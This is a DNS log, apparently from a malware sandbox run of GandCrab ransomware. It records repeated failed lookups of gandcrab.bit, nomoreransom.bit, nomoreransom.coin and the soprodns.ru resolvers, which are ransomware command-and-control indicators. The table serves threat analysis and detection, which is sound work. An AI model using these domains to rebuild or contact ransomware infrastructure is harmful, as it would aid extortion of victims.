Aug 31, 2022 23:50:50.899719000 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:50.920149088 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:50.938342094 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:50.958694935 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 31, 2022 23:48:49.340321064 CEST	8.8.8.8	192.168.2.7	0xe9db	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.466823101 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:49.536530972 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.556749105 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:49.575861931 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.594223022 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:51.490272999 CEST	8.8.8.8	192.168.2.7	0xc607	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:51.543720007 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:51.564177990 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:51.584604979 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:51.604727030 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:51.625611067 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:54.773407936 CEST	8.8.8.8	192.168.2.7	0x9c52	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:54.889055014 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:55.006886005 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.097297907 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:48:55.117695093 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.747175932 CEST	8.8.8.8	192.168.2.7	0x9c52	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.824616909 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:01.169933081 CEST	8.8.8.8	192.168.2.7	0x58a8	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:01.372771025 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:01.391752958 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:01.412412882 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:01.442105055 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:01.462238073 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:03.646867990 CEST	8.8.8.8	192.168.2.7	0xda7c	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.693329096 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:03.714029074 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.739958048 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:03.760740042 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.780883074 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:05.927884102 CEST	8.8.8.8	192.168.2.7	0x4d2c	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:05.969724894 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:05.988084078 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.013634920 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:06.033843040 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.052124023 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:08.332787037 CEST	8.8.8.8	192.168.2.7	0xece3	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.396629095 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:08.420532942 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.438788891 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:08.459163904 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.479747057 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:10.541820049 CEST	8.8.8.8	192.168.2.7	0xeb6b	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:10.586430073 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:10.607192039 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:10.627860069 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:10.646167040 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:10.664554119 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:12.801616907 CEST	8.8.8.8	192.168.2.7	0xaf5b	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.852170944 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:12.872845888 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.907861948 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:12.926351070 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.945725918 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:19.313703060 CEST	8.8.8.8	192.168.2.7	0x67b9	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.419850111 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:19.440718889 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.460870028 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:19.487466097 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.506371021 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:22.201103926 CEST	8.8.8.8	192.168.2.7	0xcf65	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.246304989 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:22.266834021 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.287790060 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:22.305758953 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.324302912 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:25.577943087 CEST	8.8.8.8	192.168.2.7	0x5f58	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.640170097 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:25.661083937 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.681529045 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:25.724030018 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.744210958 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:25.991184950 CEST	8.8.8.8	192.168.2.7	0x5f58	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.717668056 CEST	8.8.8.8	192.168.2.7	0xfd78	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.856168985 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:28.877022028 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.895523071 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:28.913804054 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.934406996 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:32.217390060 CEST	8.8.8.8	192.168.2.7	0x7b4f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:32.296617031 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:32.318643093 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:32.339747906 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:32.364142895 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:32.385826111 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:35.200468063 CEST	8.8.8.8	192.168.2.7	0xff42	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:35.311513901 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:35.384989977 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:35.468177080 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:35.551315069 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:35.570811987 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:41.316941023 CEST	8.8.8.8	192.168.2.7	0x6fa1	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.379674911 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:41.400392056 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.419595003 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:41.440679073 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.461257935 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:42.919545889 CEST	8.8.8.8	192.168.2.7	0x6fa1	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:43.962893009 CEST	8.8.8.8	192.168.2.7	0x174	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.031344891 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:44.050631046 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.070837975 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:44.091598988 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.115334988 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:47.099487066 CEST	8.8.8.8	192.168.2.7	0xa5fe	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.156781912 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:47.175007105 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.193625927 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:47.214102030 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.232800007 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:47.542625904 CEST	8.8.8.8	192.168.2.7	0xa5fe	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.484189034 CEST	8.8.8.8	192.168.2.7	0xb1d1	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.529911995 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:49.551467896 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.572386980 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:49.593506098 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.613496065 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:52.714204073 CEST	8.8.8.8	192.168.2.7	0x8ef7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.781574011 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:52.804019928 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.825433969 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:52.846256018 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.887599945 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:53.688219070 CEST	8.8.8.8	192.168.2.7	0x8ef7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:58.274665117 CEST	8.8.8.8	192.168.2.7	0x960e	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.124644041 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:59.147748947 CEST	8.8.8.8	192.168.2.7	0x960e	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.216067076 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.234318972 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:49:59.252429962 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.305018902 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:01.393326044 CEST	8.8.8.8	192.168.2.7	0x6e5a	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.436784029 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:01.455447912 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.476432085 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:01.494363070 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.515038967 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:03.356900930 CEST	8.8.8.8	192.168.2.7	0xabf0	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.394578934 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:03.413331032 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.434359074 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:03.457411051 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.476334095 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:05.684484959 CEST	8.8.8.8	192.168.2.7	0x5057	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:05.721307993 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:05.742141962 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:05.761802912 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:05.781910896 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:05.799871922 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:08.151724100 CEST	8.8.8.8	192.168.2.7	0x7000	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.186973095 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:08.220877886 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.249907017 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:08.271193981 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.294326067 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:09.698939085 CEST	8.8.8.8	192.168.2.7	0x7000	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.289400101 CEST	8.8.8.8	192.168.2.7	0x5e4a	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.315807104 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:10.335757971 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.353692055 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:10.371742964 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.390542984 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:13.730717897 CEST	8.8.8.8	192.168.2.7	0xdda6	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.763123989 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:13.783987999 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.806222916 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:13.831871986 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.855473995 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:14.389233112 CEST	8.8.8.8	192.168.2.7	0xdda6	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:14.867403984 CEST	8.8.8.8	192.168.2.7	0xdda6	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.432742119 CEST	8.8.8.8	192.168.2.7	0x4a85	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.458967924 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:15.479576111 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.500281096 CEST	8.8.8.8	192.168.2.7	0x3	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:15.520478964 CEST	8.8.8.8	192.168.2.7	0x4	Name error (3)	nomoreransom.coin	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.540834904 CEST	8.8.8.8	192.168.2.7	0x5	Name error (3)	nomoreransom.coin	none	none	28	IN (0x0001)
Aug 31, 2022 23:50:17.425961018 CEST	8.8.8.8	192.168.2.7	0xc285	Name error (3)	dns2.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.451142073 CEST	8.8.8.8	192.168.2.7	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:17.469491005 CEST	8.8.8.8	192.168.2.7	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
